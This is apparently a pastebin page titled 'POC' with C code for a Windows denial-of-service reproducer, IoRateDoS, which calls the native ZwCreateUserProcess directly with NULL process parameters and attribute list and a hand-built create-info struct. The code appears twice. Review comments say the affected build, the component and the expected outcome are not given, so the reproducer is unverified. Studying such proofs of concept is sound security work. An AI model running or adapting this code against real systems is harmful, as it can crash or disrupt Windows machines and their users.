POC
// Hand-declared layout of the create-info block whose address is passed as the
// tenth argument of ZwCreateUserProcess in IoRateDoS() below.
// Only Size, InitFlags and AdditionalFileAccess are written by that caller; every
// other field stays zero from the aggregate initialiser.
// NOTE(review): the ulonglong/ulong typedefs are not shown on this page. The
// offset comments below hold only if ulonglong is 8 bytes and ulong is 4 bytes
// (total size would then be 0x58) - confirm against the build's typedefs.
struct _PS_CREATE_INFO
{
ulonglong Size;                 // at 0x0; set to sizeof(struct) by the caller
ulonglong State;                // at 0x8; never written by the caller
ulong InitFlags;                // at 0x10; caller stores PsCreateInitialState here
ulong AdditionalFileAccess;     // at 0x14; caller stores FILE_EXECUTE here
// X0..X7: unnamed filler words; no code on this page reads or writes them.
ulonglong X0;
ulonglong X1;
ulonglong X2;
ulonglong X3;
ulonglong X4;
ulonglong X5;
ulonglong X6;
ulonglong X7;
};
// Issues a single direct call to the native ZwCreateUserProcess service with
// zero-filled object attributes, no process parameters and no attribute list,
// then prints the returned status in hex.
// NOTE(review): the function name and the page heading ("POC") present this as a
// denial-of-service reproducer, but the page does not name the affected Windows
// build, the faulting component, a CVE or the expected status/outcome. Treat it
// as an unverified reproducer until those are confirmed.
// For triage: the call bypasses the documented CreateProcess path and passes
// NULL for both ProcessParameters and AttributeList.
void IoRateDoS()
{
//--------- Parameters Start Here ----------
// Output handles; never closed in this function, so they leak if the call succeeds.
HANDLE hNewProcess = 0;
HANDLE hNewThread = 0;
ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
// Only the first member (the length field) is set; all remaining members are zero.
_OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
_OBJECT_ATTRIBUTES ObjAttr_t = {sizeof(ObjAttr_t)};
// Raw flag value; its symbolic name is not given on this page - TODO confirm.
ulonglong ProcessFlagsX = 0x1000;
ulonglong ThreadFlagsX = 0;
// Zero here becomes a NULL ProcessParameters pointer at the call site.
ulonglong ProcessParametersX = 0;
_PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
PsCreateInfo.InitFlags = PsCreateInitialState;
PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
// Zero here becomes a NULL AttributeList pointer, so no image path is supplied.
ulonglong AttributeListX = 0;
//---------------
// NOTE(review): the prototype of ZwCreateUserProcess is not shown. If it returns
// a 32-bit NTSTATUS, the value widened into `ret` may print sign-extended.
ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
ProcessDesiredAccessX, ThreadDesiredAccessX,
&ObjAttr_p, &ObjAttr_t,
ProcessFlagsX, ThreadFlagsX,
(void*)ProcessParametersX,
&PsCreateInfo,
(void*)AttributeListX);
// %I64X is the MSVC-runtime length modifier for a 64-bit integer.
printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}
RAW Paste Data
// Second copy of the create-info layout (the page repeats the listing as raw
// paste text). Its address is the tenth argument of ZwCreateUserProcess in the
// IoRateDoS() copy that follows.
// NOTE(review): the offset comments assume ulonglong is 8 bytes and ulong is
// 4 bytes; those typedefs are not shown on this page - confirm.
struct _PS_CREATE_INFO
{
ulonglong Size;                 // at 0x0; caller sets this to sizeof(struct)
ulonglong State;                // at 0x8; left zero by the caller
ulong InitFlags;                // at 0x10; caller stores PsCreateInitialState
ulong AdditionalFileAccess;     // at 0x14; caller stores FILE_EXECUTE
// X0..X7: unnamed filler words, untouched by the code on this page.
ulonglong X0;
ulonglong X1;
ulonglong X2;
ulonglong X3;
ulonglong X4;
ulonglong X5;
ulonglong X6;
ulonglong X7;
};
// Second copy of the reproducer (raw paste text). Makes one direct
// ZwCreateUserProcess call with zeroed object attributes, NULL process
// parameters and a NULL attribute list, then prints the status.
// NOTE(review): the page labels this a PoC and the name implies denial of
// service, but gives no affected build, component or expected result - unverified.
void IoRateDoS()
{
//--------- Parameters Start Here ----------
// Receives the new process/thread handles; nothing in this function closes them.
HANDLE hNewProcess = 0;
HANDLE hNewThread = 0;
ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
// Length member set, everything else zero-initialised.
_OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
_OBJECT_ATTRIBUTES ObjAttr_t = {sizeof(ObjAttr_t)};
// Magic number: symbolic flag name is not stated on the page - TODO confirm.
ulonglong ProcessFlagsX = 0x1000;
ulonglong ThreadFlagsX = 0;
// Cast to void* below, i.e. a NULL ProcessParameters argument.
ulonglong ProcessParametersX = 0;
_PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
PsCreateInfo.InitFlags = PsCreateInitialState;
PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
// Cast to void* below, i.e. a NULL AttributeList argument.
ulonglong AttributeListX = 0;
//---------------
// NOTE(review): return type of ZwCreateUserProcess is not visible here; a
// 32-bit status widened into a ulonglong may appear sign-extended when printed.
ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
ProcessDesiredAccessX, ThreadDesiredAccessX,
&ObjAttr_p, &ObjAttr_t,
ProcessFlagsX, ThreadFlagsX,
(void*)ProcessParametersX,
&PsCreateInfo,
(void*)AttributeListX);
// %I64X: MSVC-runtime specifier for a 64-bit hexadecimal value.
printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}
